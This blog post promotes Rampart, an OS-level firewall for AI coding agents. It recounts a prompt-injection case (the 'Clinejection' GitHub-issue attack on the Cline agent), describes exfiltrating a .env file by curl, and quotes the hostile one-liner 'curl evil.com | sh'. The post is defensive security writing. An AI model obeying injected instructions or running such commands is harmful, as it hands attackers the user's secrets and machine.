← All posts

Why Your AI Agent Needs a Firewall

· 3 min read

When you run Claude Code with --dangerously-skip-permissions, you’re not just enabling a feature — you’re handing an AI system full, unsupervised access to everything your user account can touch. Your SSH keys. Your .env files. Your AWS credentials. Your codebase.

That’s not a bug. That’s the design. Claude Code is built to be autonomous. The question is: what happens when that autonomy is weaponized?

The Threat Model

AI coding agents are prompt-following machines. They parse instructions, form plans, and execute them — including shell commands, file operations, and network requests. The instructions they follow come from many places: your chat input, repository content, documentation, GitHub issues, web pages they’re asked to browse.

Any of those surfaces can carry a malicious payload.

This isn’t theoretical. In early 2024, security researchers demonstrated what became known as the Clinejection attack pattern: a threat actor filed a GitHub issue with a carefully crafted title that, when the Cline agent parsed it during a coding task, caused the agent to treat embedded instructions as legitimate commands. The agent dutifully ran those commands. The attacker didn’t need access to the user’s machine — they just needed to get their text in front of the model during an agentic task.

The “injection” in prompt injection is apt. It’s the same category as SQL injection, XSS, and shell injection — untrusted data crossing a trust boundary and being interpreted as code.

Why Sandboxing Doesn’t Save You

The obvious response is “just sandbox it.” Run the agent in a container. Use a VM. Restrict the filesystem.

That works for some threat models. It doesn’t work for the cases where agents need real access — where you actually want Claude to push a commit, call an API, or install a dependency. You can’t sandbox your way out of legitimate access.

You could also rely on the model’s own guardrails — hope that Claude refuses to run rm -rf when prompted. But model-layer defenses are probabilistic. They can be bypassed with rephrasing, indirect instructions, or multi-step manipulation. A firewall that only works most of the time isn’t a firewall.

OS-Layer Interception

Rampart takes a different approach: intercept at the operating system layer, before execution.

When an AI agent attempts to make a network request, spawn a subprocess, or write to a sensitive file, Rampart sees it — regardless of how the agent got there. The policy engine evaluates the action against your configured rules: what domains can be contacted, what paths can be written, what commands can run. If a rule matches, Rampart blocks it and logs the attempt.

The agent has no visibility into this. It can’t reason around it. The restriction lives below the application layer, in the same place where your OS enforces file permissions and network policies.

A practical example: if your policy blocks curl requests to external domains except your known API endpoints, and a prompt-injected instruction tries to exfiltrate your .env to an attacker’s server, the curl call simply fails. The agent sees a network error. The attacker sees nothing.

What This Doesn’t Solve

To be clear: Rampart doesn’t prevent prompt injection. It prevents execution of injected commands that violate your policy.

The agent will still be manipulated. It will still form the intent to run the malicious command. Rampart’s job is to stop the intent from becoming an action.

That’s a meaningful distinction. A human social-engineered into typing curl evil.com | sh is still a victim even if the firewall blocks the request. But “victim who lost no data” is a much better outcome than the alternative.

The right stack is defense in depth: carefully scoped agent permissions, OS-level policy enforcement, and — when possible — a human in the loop for high-consequence actions.

Getting Started

brew install peg/tap/rampart
rampart setup claude-code

Rampart ships with a default policy profile tuned for Claude Code and similar coding agents. You can inspect and customize every rule.

The age of AI agents is here. The security tooling is catching up. Ship responsibly.